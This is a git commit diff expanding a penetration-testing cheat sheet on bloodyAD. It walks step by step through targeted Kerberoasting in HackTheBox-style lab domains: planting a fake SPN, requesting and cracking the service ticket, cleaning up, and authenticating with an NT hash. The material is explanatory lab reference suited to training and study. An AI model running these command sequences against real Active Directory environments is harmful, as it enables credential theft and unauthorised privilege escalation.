commit da4192ee6a431f30aedf931a43c31da65b88387d
parent 742c5791258440ee1c018c0479138f9ace814ef2
Author: $: DAΞMON <zer0sec.xp@icloud.com>
Date: Sat, 19 Sep 2026 06:05:48 +0100
docs(bloodyad): expand GenericWrite targeted Kerberoast section
- Add plain-English explanation of why planting an SPN enables roasting
- Explain what the SPN value (HTTP/fake) actually means and why it's arbitrary
- Document each step individually with inline notes on what the DC does
- Add tombwatcher.htb manual bloodyAD equivalent of targetedKerberoast
- Add tip: bloodyAD accepts :NTHASH in place of a plaintext password
Diffstat:
1 file changed, 57 insertions(+), 4 deletions(-)
diff --git a/src/content/sheets/active-directory/bloodyad.md b/src/content/sheets/active-directory/bloodyad.md
@@ -275,24 +275,77 @@ bloodyAD --host 10.10.11.51 -d sequel.htb -u ryan -p 'Passw0rd!' add groupMember
Write to (most) attributes, but not the DACL. You can't reset the password, but you can plant an SPN, a Key Credential, or a logon script.
-**Targeted Kerberoast — step 1, plant a fake SPN:**
+#### Targeted Kerberoast
+
+**How it works.** Kerberos issues a TGS (service ticket) for any account that has a Service Principal Name. That ticket is encrypted with the account's password hash. Normally only service accounts have SPNs. GenericWrite lets you write `servicePrincipalName` on a regular user, so you plant a fake SPN, ask the DC for a ticket, and get a `$krb5tgs$` hash you can crack offline. The three steps are: plant → request → clean up.
+
+**Step 1 — plant a fake SPN on the target:**
```bash
bloodyAD --host 10.10.11.51 -d sequel.htb -u ryan -p 'Passw0rd!' set object victim servicePrincipalName -v 'HTTP/fake.sequel.htb'
```
-**Targeted Kerberoast — step 2, request the TGS:**
+`set object <target> servicePrincipalName -v '<value>'` writes the SPN attribute. The value itself (`HTTP/fake.sequel.htb`) is arbitrary — it just needs to look like a valid SPN so the DC accepts it. The account is now Kerberoastable.
+
+**Step 2 — request the TGS (this produces the crackable hash):**
```bash
GetUserSPNs.py sequel.htb/ryan:'Passw0rd!' -dc-ip 10.10.11.51 -request-user victim
```
-**Targeted Kerberoast — step 3, clear the SPN (cleanup):**
+The DC hands back a TGS encrypted with `victim`'s password hash. Impacket prints it as a `$krb5tgs$23$` hash ready for hashcat.
+
+**Step 3 — clear the SPN (cleanup):**
```bash
bloodyAD --host 10.10.11.51 -d sequel.htb -u ryan -p 'Passw0rd!' set object victim servicePrincipalName
```
+Omitting `-v` clears the attribute. A stray SPN is an IOC and can break the account's authentication, so always clean up.
+
+**Crack the hash:**
+
+```bash
+hashcat -m 13100 victim.hash /usr/share/wordlists/rockyou.txt
+```
+
+> **Tip — `targetedKerberoast` automates all three steps.** The tool sets the SPN, requests the TGS, and removes the SPN in one shot. Use bloodyAD's manual three-step flow when you want granular control or when `targetedKerberoast` is not available.
+>
+> ```bash
+> targetedKerberoast -v -d sequel.htb -u ryan -p 'Passw0rd!' --request-user victim
+> ```
+
+> **Tip — bloodyAD accepts an NT hash instead of a password.** If you have a hash but no plaintext, pass it with a leading colon in place of the password. All three steps work the same way.
+>
+> ```bash
+> # Plant
+> bloodyAD --host 10.10.11.51 -d sequel.htb -u ryan -p ':aad3b435b51404eeaad3b435b51404ee' set object victim servicePrincipalName -v 'HTTP/fake'
+>
+> # Clean up
+> bloodyAD --host 10.10.11.51 -d sequel.htb -u ryan -p ':aad3b435b51404eeaad3b435b51404ee' set object victim servicePrincipalName
+> ```
+>
+> The format is `:NTHASH` (LM blank, colon, then the 32-character NT hash). See the Authentication section for the full LM:NT form.
+
+**Manual bloodyAD equivalent for a different target (tombwatcher.htb example):**
+
+```bash
+# Step 1 — plant the SPN (henry has GenericWrite or WriteSPN over alfred)
+bloodyAD --host <DC-IP> -d tombwatcher.htb -u henry -p 'H3nry_987TGV!' \
+ set object alfred servicePrincipalName -v 'HTTP/fake.tombwatcher.htb'
+
+# Step 2 — request the TGS
+GetUserSPNs.py tombwatcher.htb/henry:'H3nry_987TGV!' -dc-ip <DC-IP> -request-user alfred
+
+# Step 3 — remove the SPN
+bloodyAD --host <DC-IP> -d tombwatcher.htb -u henry -p 'H3nry_987TGV!' \
+ set object alfred servicePrincipalName
+```
+
+```bash
+hashcat -m 13100 alfred.hash /usr/share/wordlists/rockyou.txt
+```
+
**Shadow credentials (also available via GenericWrite):**
```bash
@@ -486,7 +539,7 @@ bloodyAD --host 10.10.11.51 -d sequel.htb -u ryan -p 'Passw0rd!' remove rbcd 'DC
### WriteSPN
-Write `servicePrincipalName` → targeted Kerberoast. Same three steps as under GenericWrite.
+Write `servicePrincipalName` directly — a narrower right than GenericWrite, but the attack is identical. Follow the same three steps as under GenericWrite above.
```bash
bloodyAD --host 10.10.11.51 -d sequel.htb -u ryan -p 'Passw0rd!' set object victim servicePrincipalName -v 'HTTP/fake.sequel.htb'